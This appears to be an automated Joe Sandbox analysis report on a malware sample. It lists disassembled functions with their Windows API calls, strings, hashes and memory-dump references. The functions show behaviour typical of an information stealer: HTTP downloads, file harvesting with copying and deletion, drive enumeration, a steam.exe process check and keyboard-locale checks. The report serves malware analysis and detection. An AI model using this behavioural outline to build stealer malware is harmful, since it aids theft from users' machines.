Opcode ID: f1e3822939e737a21fd54eb257afb52ac7ef116d19cecf2d518cc0a312e568a6
Instruction ID: 7f0ad2c9892c3da470460350888d451acf1a3812ce4b175f0d063b84b489bb61
Opcode Fuzzy Hash: f1e3822939e737a21fd54eb257afb52ac7ef116d19cecf2d518cc0a312e568a6
Instruction Fuzzy Hash: C781FB71D4022DABCF61EB64DC46ADD77B9FF08301F0485E6A948A3111DF31AB999FA0

Function 00D5688F Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A10
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A16
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A1C
Part of subcall function 00D549DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00D54A2E
Part of subcall function 00D549DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00D54A36

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D568F1
StrCmpCA.SHLWAPI(?), ref: 00D5690B
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D5693A
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00D56979
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D569A9
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D569B4
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00D569D8
InternetReadFile.WININET(?,?,000007CF,?), ref: 00D56A6C
InternetCloseHandle.WININET(?), ref: 00D56A7C
InternetCloseHandle.WININET(?), ref: 00D56A88
InternetCloseHandle.WININET(?), ref: 00D56A94

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Strings

ERROR, xrefs: 00D569E2
ERROR, xrefs: 00D56AD7
GET, xrefs: 00D5696E

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: c4cfb160f560bf515c267f55b489933abf152aacf45b991268fdbe68047c0943
Instruction ID: 5cf27c4ae55dcb21f028fb714ed1d5141e500aa0243a3ed9e647e0ee6ffea5d4
Opcode Fuzzy Hash: c4cfb160f560bf515c267f55b489933abf152aacf45b991268fdbe68047c0943
Instruction Fuzzy Hash: E651707194012DAFDF209B60DC85AEE77B8FB04345F0481A6FA48B7161DE309E899FA0

Function 00D51D70 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

FindFirstFileA.KERNEL32(?,?,00D8BBCC,00D8BBD0,00D87AC2,00D87ABF,00D6953D,?,00000000), ref: 00D51F94
StrCmpCA.SHLWAPI(?,00D8BBD4), ref: 00D51FC7
StrCmpCA.SHLWAPI(?,00D8BBD8), ref: 00D51FE1
FindFirstFileA.KERNEL32(?,?,00D8BBDC,00D8BBE0,?,00D8BBE4,00D87AC3), ref: 00D520CD
CopyFileA.KERNEL32(?,?,00000001), ref: 00D522B3

Part of subcall function 00D63A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00D63A59

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

DeleteFileA.KERNEL32(?), ref: 00D52326
FindNextFileA.KERNEL32(?,?), ref: 00D52392
FindClose.KERNEL32(?), ref: 00D523A6
CopyFileA.KERNEL32(?,?,00000001), ref: 00D525CC

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

DeleteFileA.KERNEL32(?), ref: 00D5263F

Part of subcall function 00D68BE6: Sleep.KERNEL32(000003E8,?,?), ref: 00D68C4D

FindNextFileA.KERNEL32(?,?), ref: 00D526B6
FindClose.KERNEL32(?), ref: 00D526CA

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D639EE: GetFileAttributesA.KERNEL32(?,?,?,00D5EA72,?,?,?), ref: 00D639F5

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Strings

\*.*, xrefs: 00D51E8E

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1475085387-1173974218
Opcode ID: c5eea302339a196a6a1b4f8f52038c9699afba533704a17baf38e57fc4e30bc6
Instruction ID: 06efe62d2fb7c481239346a8bf80891e738c093262a93030f82a7440fdbceafc
Opcode Fuzzy Hash: c5eea302339a196a6a1b4f8f52038c9699afba533704a17baf38e57fc4e30bc6
Instruction Fuzzy Hash: 2F32A3319411299BCF21FB25DC46AEDB374EF09301F5105E1AD4877262DA31AF8A8FB4

Function 00D68D90 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?,?,?,?), ref: 00D68DB4
wsprintfA.USER32 ref: 00D68DD5
FindFirstFileA.KERNEL32(?,?), ref: 00D68DEC
_mbscmp.MSVCRT ref: 00D68E13
_mbscmp.MSVCRT ref: 00D68E2B
_splitpath.MSVCRT ref: 00D68E66
_ismbcupper.MSVCRT ref: 00D68EB3
wsprintfA.USER32 ref: 00D68EE1
SHFileOperationA.SHELL32(?), ref: 00D68F56
FindNextFileA.KERNELBASE(?,?), ref: 00D68F69
FindClose.KERNEL32(?), ref: 00D68F7D

Strings

%s\*, xrefs: 00D68DCF
%s\%s, xrefs: 00D68EDB

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: FileFind$_mbscmpwsprintf$CloseFirstFolderNextOperationPath_ismbcupper_splitpath
String ID: %s\%s$%s\*
API String ID: 102359269-2848263008
Opcode ID: a12d6f87e1cd6f36afd3b2cacbee577e65d84922cd1d1d3644f2d17b3d7c44db
Instruction ID: bd6cb7579dceac512f9bca2b6377efb6717c57644067074befad2864af81a75b
Opcode Fuzzy Hash: a12d6f87e1cd6f36afd3b2cacbee577e65d84922cd1d1d3644f2d17b3d7c44db
Instruction Fuzzy Hash: B851B37190065C5FDB11DB68DC88BEB7BBCAB08301F144AE5E549E3141EA319A898F70

Function 00D67178 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00D671A5
FindFirstFileA.KERNEL32(?,?), ref: 00D671BC
StrCmpCA.SHLWAPI(?,00D87AC0), ref: 00D671DD
StrCmpCA.SHLWAPI(?,00D87AC4), ref: 00D671F7
lstrcatA.KERNEL32(?), ref: 00D67248
lstrcatA.KERNEL32(?), ref: 00D6725B
lstrcatA.KERNEL32(?,?), ref: 00D6726F
lstrcatA.KERNEL32(?,?), ref: 00D67282
lstrcatA.KERNEL32(?,00D87AC8), ref: 00D67294
lstrcatA.KERNEL32(?,?), ref: 00D672A8

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

FindNextFileA.KERNEL32(?,?), ref: 00D6735E
FindClose.KERNEL32(?), ref: 00D67372

Strings

%s\%s, xrefs: 00D67199

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 316b8f3a0c3719777ef9af1a98eff7a6accb73180e5e8133c46b1da4d34c0226
Instruction ID: cbc4776f9e6f58c9c6399f9723bf6b619c97bc7fc0149d412347d11363253bbd
Opcode Fuzzy Hash: 316b8f3a0c3719777ef9af1a98eff7a6accb73180e5e8133c46b1da4d34c0226
Instruction Fuzzy Hash: 95511FB190021CABCF60DB64CC49ADDB7B8EB49300F1005E6AA08E3250EB319B99DF75

Function 00D66E7F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 144stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00D66EFF
_memset.LIBCMT ref: 00D66F22
GetDriveTypeA.KERNEL32(?), ref: 00D66F2B
lstrcpyA.KERNEL32(?,?), ref: 00D66F4B
lstrcpyA.KERNEL32(?,?), ref: 00D66F65

Part of subcall function 00D66A05: wsprintfA.USER32 ref: 00D66A59
Part of subcall function 00D66A05: FindFirstFileA.KERNEL32(?,?), ref: 00D66A70
Part of subcall function 00D66A05: _memset.LIBCMT ref: 00D66A8C
Part of subcall function 00D66A05: _memset.LIBCMT ref: 00D66A9D
Part of subcall function 00D66A05: StrCmpCA.SHLWAPI(?,00D87A38), ref: 00D66ABE
Part of subcall function 00D66A05: StrCmpCA.SHLWAPI(?,00D87A3C), ref: 00D66AD8
Part of subcall function 00D66A05: wsprintfA.USER32 ref: 00D66AFF
Part of subcall function 00D66A05: StrCmpCA.SHLWAPI(?,00D8766E), ref: 00D66B13
Part of subcall function 00D66A05: wsprintfA.USER32 ref: 00D66B3C
Part of subcall function 00D66A05: _memset.LIBCMT ref: 00D66B65
Part of subcall function 00D66A05: lstrcatA.KERNEL32(?,?), ref: 00D66B7A

lstrcpyA.KERNEL32(?,00000000), ref: 00D66F85
lstrlenA.KERNEL32(?), ref: 00D66FFF

Strings

%DRIVE_REMOVABLE%, xrefs: 00D66F51
*%DRIVE_FIXED%*, xrefs: 00D66E9B
%DRIVE_FIXED%, xrefs: 00D66F6B
*%DRIVE_REMOVABLE%*, xrefs: 00D66ECC

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: 0c01e4c6123a8e01dfb151911710ecc511fd4db06a6d020d43e38dfb4a0e2b59
Instruction ID: 4ba8e949279204d9906fa11eae9290ba951d856504e80f53a7a604cb0a27ead2
Opcode Fuzzy Hash: 0c01e4c6123a8e01dfb151911710ecc511fd4db06a6d020d43e38dfb4a0e2b59
Instruction Fuzzy Hash: 67512CB590025CAFDF609F64DC85AD9BBB8FF05304F004195EA48A6211E7329E89CF65

Function 00D642EE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00D642F8
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D6431A
Process32First.KERNEL32(00000000,00000128), ref: 00D6432A
Process32Next.KERNEL32(00000000,00000128), ref: 00D6433C
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00D6434E
CloseHandle.KERNEL32(00000000), ref: 00D64367

Strings

steam.exe, xrefs: 00D642FD, 00D64346

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: a0b2b7c02197d31c264876100589e02788a19a8d7f793a118792d329c3ddcedb
Instruction ID: 7767bd8c7be354aed83d33b55adb35370f4725e35823c2d7deb356dd3ce731bc
Opcode Fuzzy Hash: a0b2b7c02197d31c264876100589e02788a19a8d7f793a118792d329c3ddcedb
Instruction Fuzzy Hash: A501EC70941119ABDBA1EF648C49BEEB6B8BF05350F144196E549E2260D7348F858F70

Function 00D62A37 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

GetKeyboardLayoutList.USER32(00000000,00000000,00D87812,?,?), ref: 00D62A68
LocalAlloc.KERNEL32(00000040,00000000), ref: 00D62A76
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00D62A84
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00D62AB3

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

LocalFree.KERNEL32(00000000), ref: 00D62B5B

Strings

/ , xrefs: 00D62ACF

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 525a593702e137b703a265c14c5f22805a9ee2628c1ad5b52c2a83d3082f06f0
Instruction ID: d6190ad6515c1d7d7f3b268b09d47a17b3888135581e3a18951b7c59a348d12f
Opcode Fuzzy Hash: 525a593702e137b703a265c14c5f22805a9ee2628c1ad5b52c2a83d3082f06f0
Instruction Fuzzy Hash: 8031EDB1D40228ABDB60AF64DC89BAEB3B8FB08301F1041E5B919A7152CB745F85CF70

Function 00D633B3 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00D633BA
CoCreateInstance.OLE32(00D84220,00000000,00000001,00D8C180,?,00000018,00D6355D,?), ref: 00D633DD
SysAllocString.OLEAUT32(?), ref: 00D633EA
_wtoi64.MSVCRT ref: 00D6341D
SysFreeString.OLEAUT32(?), ref: 00D63436
SysFreeString.OLEAUT32(00000000), ref: 00D6343D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: b89d22354446194be7b170e2465cf6d9a37ae04b4ffd6b10d7e2232cc9a90a11
Instruction ID: 1bf781ee77033d5d5a3132173b4a2b99e399aa16bec44f71d29f0e618d7b268b
Opcode Fuzzy Hash: b89d22354446194be7b170e2465cf6d9a37ae04b4ffd6b10d7e2232cc9a90a11
